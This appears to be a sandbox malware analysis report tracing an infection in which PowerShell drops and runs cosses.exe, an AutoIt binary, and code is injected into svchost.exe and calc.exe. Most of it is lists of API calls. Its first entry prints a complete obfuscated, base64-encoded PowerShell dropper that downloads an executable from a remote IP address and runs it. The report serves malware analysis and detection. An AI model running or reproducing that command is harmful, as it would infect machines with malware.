                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"Jump to behavior
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: This is a third-party compiled AutoIt script.6_2_00113B3A
                  Source: cosses.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: cosses.exe, 00000006.00000002.1471069477.00000000001C4000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3cf20019-5
                  Source: cosses.exe, 00000006.00000002.1471069477.00000000001C4000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_a2ca3f76-5
                  Source: cosses.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0be3bd97-4
                  Source: cosses.exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_416d9603-4
                  Source: cosses[1].exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_75ead3d6-f
                  Source: cosses[1].exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_eb62f09e-6
                  Powershell drops PE file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\cosses.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cosses[1].exeJump to dropped file
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042C6C3 NtClose,7_2_0042C6C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036735C0 NtCreateMutant,LdrInitializeThunk,7_2_036735C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672B60 NtClose,LdrInitializeThunk,7_2_03672B60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03672DF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03672C70
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03674340 NtSetContextThread,7_2_03674340
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03673010 NtOpenDirectoryObject,7_2_03673010
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03673090 NtSetValueKey,7_2_03673090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03674650 NtSuspendThread,7_2_03674650
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672BE0 NtQueryValueKey,7_2_03672BE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672BF0 NtAllocateVirtualMemory,7_2_03672BF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672BA0 NtEnumerateValueKey,7_2_03672BA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672B80 NtQueryInformationFile,7_2_03672B80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672AF0 NtWriteFile,7_2_03672AF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672AD0 NtReadFile,7_2_03672AD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672AB0 NtWaitForSingleObject,7_2_03672AB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036739B0 NtGetContextThread,7_2_036739B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672F60 NtCreateProcessEx,7_2_03672F60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672F30 NtCreateSection,7_2_03672F30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672FE0 NtCreateFile,7_2_03672FE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672FA0 NtQuerySection,7_2_03672FA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672FB0 NtResumeThread,7_2_03672FB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672F90 NtProtectVirtualMemory,7_2_03672F90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672E30 NtWriteVirtualMemory,7_2_03672E30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672EE0 NtQueueApcThread,7_2_03672EE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672EA0 NtAdjustPrivilegesToken,7_2_03672EA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672E80 NtReadVirtualMemory,7_2_03672E80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03673D70 NtOpenThread,7_2_03673D70
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672D30 NtUnmapViewOfSection,7_2_03672D30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672D00 NtSetInformationFile,7_2_03672D00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672D10 NtMapViewOfSection,7_2_03672D10
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03673D10 NtOpenProcessToken,7_2_03673D10
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672DD0 NtDelayExecution,7_2_03672DD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672DB0 NtEnumerateKey,7_2_03672DB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672C60 NtCreateKey,7_2_03672C60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672C00 NtQueryInformationProcess,7_2_03672C00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672CF0 NtOpenProcess,7_2_03672CF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672CC0 NtQueryVirtualMemory,7_2_03672CC0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672CA0 NtQueryInformationToken,7_2_03672CA0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E4650 NtSuspendThread,LdrInitializeThunk,12_2_052E4650
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E4340 NtSetContextThread,LdrInitializeThunk,12_2_052E4340
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_052E2D30
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2D10 NtMapViewOfSection,LdrInitializeThunk,12_2_052E2D10
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_052E2DF0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2DD0 NtDelayExecution,LdrInitializeThunk,12_2_052E2DD0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2C60 NtCreateKey,LdrInitializeThunk,12_2_052E2C60
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_052E2C70
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_052E2CA0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2F30 NtCreateSection,LdrInitializeThunk,12_2_052E2F30
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2FB0 NtResumeThread,LdrInitializeThunk,12_2_052E2FB0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2FE0 NtCreateFile,LdrInitializeThunk,12_2_052E2FE0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_052E2E80
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2EE0 NtQueueApcThread,LdrInitializeThunk,12_2_052E2EE0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2B60 NtClose,LdrInitializeThunk,12_2_052E2B60
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_052E2BA0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2BE0 NtQueryValueKey,LdrInitializeThunk,12_2_052E2BE0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_052E2BF0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2AF0 NtWriteFile,LdrInitializeThunk,12_2_052E2AF0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2AD0 NtReadFile,LdrInitializeThunk,12_2_052E2AD0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E35C0 NtCreateMutant,LdrInitializeThunk,12_2_052E35C0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E39B0 NtGetContextThread,LdrInitializeThunk,12_2_052E39B0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2D00 NtSetInformationFile,12_2_052E2D00
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2DB0 NtEnumerateKey,12_2_052E2DB0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2C00 NtQueryInformationProcess,12_2_052E2C00
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2CF0 NtOpenProcess,12_2_052E2CF0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2CC0 NtQueryVirtualMemory,12_2_052E2CC0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2F60 NtCreateProcessEx,12_2_052E2F60
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2FA0 NtQuerySection,12_2_052E2FA0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2F90 NtProtectVirtualMemory,12_2_052E2F90
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2E30 NtWriteVirtualMemory,12_2_052E2E30
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2EA0 NtAdjustPrivilegesToken,12_2_052E2EA0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2B80 NtQueryInformationFile,12_2_052E2B80
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E2AB0 NtWaitForSingleObject,12_2_052E2AB0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E3010 NtOpenDirectoryObject,12_2_052E3010
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E3090 NtSetValueKey,12_2_052E3090
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E3D10 NtOpenProcessToken,12_2_052E3D10
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E3D70 NtOpenThread,12_2_052E3D70
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_032592B0 NtCreateFile,12_2_032592B0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_03259720 NtAllocateVirtualMemory,12_2_03259720
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_03259510 NtDeleteFile,12_2_03259510
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_032595B0 NtClose,12_2_032595B0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_03259420 NtReadFile,12_2_03259420
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,6_2_0017A1EF
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00168310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00168310
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_001751BD
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0013D9756_2_0013D975
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001321C56_2_001321C5
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001462D26_2_001462D2
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001903DA6_2_001903DA
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0014242E6_2_0014242E
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001325FA6_2_001325FA
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0016E6166_2_0016E616
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0011E6A06_2_0011E6A0
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001266E16_2_001266E1
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0014878F6_2_0014878F
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001288086_2_00128808
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001908576_2_00190857
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001468446_2_00146844
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001788896_2_00178889
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0013CB216_2_0013CB21
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00146DB66_2_00146DB6
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00126F9E6_2_00126F9E
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001230306_2_00123030
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001331876_2_00133187
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0013F1D96_2_0013F1D9
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001112876_2_00111287
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001314846_2_00131484
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001255206_2_00125520
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001376966_2_00137696
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001257606_2_00125760
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001319786_2_00131978
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00149AB56_2_00149AB5
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0011FCE06_2_0011FCE0
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00131D906_2_00131D90
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0013BDA66_2_0013BDA6
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00197DDB6_2_00197DDB
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0011DF006_2_0011DF00
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00123FE06_2_00123FE0
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_016CC3086_2_016CC308
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004187037_2_00418703
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004101637_2_00410163
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E1637_2_0040E163
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004011707_2_00401170
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004169037_2_00416903
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E2B37_2_0040E2B3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042ECC37_2_0042ECC3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E4AF7_2_0040E4AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040258B7_2_0040258B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004025907_2_00402590
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402E707_2_00402E70
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040FF437_2_0040FF43
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040FF3A7_2_0040FF3A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D34C7_2_0362D34C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FA3527_2_036FA352
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F132D7_2_036F132D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F07_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037003E67_2_037003E6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0368739A7_2_0368739A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E02747_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C07_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036452A07_2_036452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0367516C7_2_0367516C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F1727_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370B16B7_2_0370B16B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036301007_2_03630100
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA1187_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F81CC7_2_036F81CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364B1B07_2_0364B1B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037001AA7_2_037001AA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F70E97_2_036F70E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FF0E07_2_036FF0E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF0CC7_2_036EF0CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C07_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036407707_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036647507_2_03664750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363C7C07_2_0363C7C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FF7B07_2_036FF7B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365C6E07_2_0365C6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F16CC7_2_036F16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F75717_2_036F7571
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036405357_2_03640535
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DD5B07_2_036DD5B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037005917_2_03700591
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036314607_2_03631460
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F24467_2_036F2446
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FF43F7_2_036FF43F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EE4F67_2_036EE4F6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FFB767_2_036FFB76
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FAB407_2_036FAB40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0367DBF97_2_0367DBF9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F6BD77_2_036F6BD7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03609B807_2_03609B80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365FB807_2_0365FB80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B3A6C7_2_036B3A6C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FFA497_2_036FFA49
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F7A467_2_036F7A46
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EDAC67_2_036EDAC6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DDAAC7_2_036DDAAC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03685AA07_2_03685AA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA807_2_0363EA80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036569627_2_03656962
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036499507_2_03649950
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B9507_2_0365B950
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A07_2_036429A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370A9A67_2_0370A9A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036428407_2_03642840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364A8407_2_0364A840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AD8007_2_036AD800
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036438E07_2_036438E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E8F07_2_0366E8F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036268B87_2_036268B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B4F407_2_036B4F40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03682F287_2_03682F28
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03660F307_2_03660F30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FFF097_2_036FFF09
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364CFE07_2_0364CFE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03632FC87_2_03632FC8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03603FD27_2_03603FD2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03603FD57_2_03603FD5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FFFB17_2_036FFFB1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641F927_2_03641F92
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640E597_2_03640E59
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FEE267_2_036FEE26
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FEEDB7_2_036FEEDB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03649EB07_2_03649EB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03652E907_2_03652E90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FCE937_2_036FCE93
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F7D737_2_036F7D73
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03643D407_2_03643D40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F1D5A7_2_036F1D5A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364AD007_2_0364AD00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363ADE07_2_0363ADE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365FDC07_2_0365FDC0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03658DBF7_2_03658DBF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B9C327_2_036B9C32
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640C007_2_03640C00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630CF27_2_03630CF2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FFCF27_2_036FFCF2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0CB57_2_036E0CB5
